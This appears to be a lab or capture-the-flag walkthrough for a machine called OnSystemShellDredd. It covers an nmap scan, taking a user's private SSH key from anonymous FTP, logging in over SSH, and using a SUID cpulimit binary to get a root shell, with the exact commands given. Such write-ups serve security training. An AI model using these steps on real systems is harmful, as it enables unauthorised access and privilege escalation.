# OnSystemShellDredd

## Nmap

```
sudo nmap 192.168.172.130 -p- -sS -sV

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

FTP on the host is open to anonymous login. When logged in use `ls -la` to view hidden files. Upon moving into the .hannah directory ensure **binary** mode is enabled then grab the id\_rsa.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-baf0f94e2bfaf24bb92348b740d704a9b1fbc9b7%2Fimage.png?alt=media)

Ensure to change the permissions on the id\_rsa to make it usable.

```
chmod 600 id_rsa
```

Then proceed to login as the user hannah specifying port 61000.

```
ssh -p 61000 -i id_rsa hannah@192.168.172.130
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-683222b2103a08143f97d000f8e023aa88f3d78c%2Fimage.png?alt=media)

Running linpeas on the target machine after transferring over finds the binary cpulimit has a SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c3e6805c4fcdd595d775b98a2d939b579658a83%2Fimage.png?alt=media)

Checking GTFOBins against this binary reports the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d84843e415177171435f47a6dc4d637243bd4783%2Fimage.png?alt=media)

We can then use the following command to gain a root shell:

```
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1792383a383dc1bb184871294af8a1b75753bfd8%2Fimage.png?alt=media)